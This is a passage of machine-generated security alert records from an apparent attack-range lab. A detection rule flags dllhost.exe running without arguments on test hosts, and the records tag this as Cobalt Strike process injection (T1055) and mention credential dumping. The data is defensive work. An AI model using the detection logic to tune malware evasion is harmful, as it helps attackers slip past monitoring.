annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5560", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="2", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5548", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x54ac", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5290", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x51a0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4ca4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4890", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x44ac", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3e68", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3c54", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3a5c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x33fc", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x2900", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x17c8", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x13e8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="5780", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4048", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="22584", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="19680", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", 